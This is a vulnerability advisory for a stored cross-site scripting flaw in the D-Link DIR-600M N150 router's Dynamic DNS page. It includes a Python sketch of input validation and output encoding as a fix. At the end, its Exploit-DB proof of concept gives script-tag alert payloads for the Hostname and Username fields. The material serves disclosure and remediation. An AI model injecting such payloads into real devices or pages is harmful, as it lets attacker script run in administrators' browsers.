Vendor: DIR-600M N150
By: PUNIT DARJI
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting)
Product Name: DIR-600M N150
Affected Version From: DIR-600M Firmware 3.01
Affected Version To: DIR-600M Firmware 3.01
Patch Exists: YES
Related CWE: N/A
CPE: h:d-link:dir-600m_n150
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2018

D-Link Dir-600M N150 – Cross-Site Scripting

A Cross-Site Scripting (XSS) vulnerability was discovered in the D-Link Dir-600M N150 router. An attacker can inject malicious JavaScript code into the 'Hostname' and 'Username' fields of the Dynamic DNS page, which will be executed when the page is loaded by an authenticated user.

Mitigation:

To mitigate this vulnerability, users should ensure that they are running the latest version of the firmware and should not enter any untrusted input into the 'Hostname' and 'Username' fields of the Dynamic DNS page.
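
The firmware-side fix for this class of flaw is to validate the two fields before saving and to HTML-encode them whenever they are echoed back. The sketch below is an added example, not D-Link's code and not part of the original advisory; the page template, function names and validation rules are assumptions.

```python
import html
import re

# Hypothetical fragment of the Dynamic DNS page (assumption: the advisory does
# not show the firmware's real template, only that stored values are echoed).
PAGE = ("<tr><td>Hostname</td><td>{hostname}</td></tr>"
        "<tr><td>Username</td><td>{username}</td></tr>")

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")
# Assumed policy for DDNS account names: no markup metacharacters allowed.
USERNAME_RE = re.compile(r"[A-Za-z0-9._@+-]{1,64}")

# The two field values used in the PoC on this page.
POC_HOST = '<script>alert("PSYCHO55")</script>'
POC_USER = '<script>alert("PunitDarji")</script>'


def render_vulnerable(hostname: str, username: str) -> str:
    """Echo stored values into HTML unencoded (the behaviour the PoC relies on)."""
    return PAGE.format(hostname=hostname, username=username)


def validate_ddns(hostname: str, username: str) -> list:
    """Return the names of the fields that must be rejected before saving."""
    bad = []
    if len(hostname) > 253 or not HOSTNAME_RE.fullmatch(hostname):
        bad.append("hostname")
    if not USERNAME_RE.fullmatch(username):
        bad.append("username")
    return bad


def render_hardened(hostname: str, username: str) -> str:
    """Encode on output so values already stored in the config stay inert."""
    return PAGE.format(hostname=html.escape(hostname, quote=True),
                       username=html.escape(username, quote=True))


if __name__ == "__main__":
    print(validate_ddns(POC_HOST, POC_USER))        # both fields rejected
    print(render_vulnerable(POC_HOST, POC_USER))    # markup reaches the browser
    print(render_hardened(POC_HOST, POC_USER))      # markup shown as text
    print(validate_ddns("home.example.org", "ddns-user"))
```

Output encoding is the control that matters for values saved before a firmware update; input validation alone would leave previously stored values active.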

Exploit-DB raw data:

# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting
# Date: 2018-09-06
# Exploit Author: PUNIT DARJI
# Vendor Homepage: www.dlink.co.in
# Hardware Link: https://amzn.to/2NUIniO
# Version: DIR-600M Firmware 3.01
# Tested on: Windows 7 ultimate
# CVE: N/A

#POC

Go to your Wifi Router Gateway [i.e.: 192.168.X.X, the IP address of the router]
Go to --> "Advance" --> "Dynamic DNS" --> "Hostname" --> <script>alert("PSYCHO55")</script>
"Username" --> <script>alert("PunitDarji")</script>
and hit apply. Refresh the page, and you will get the 2 pop-ups: first "PSYCHO55" and second "PunitDarji".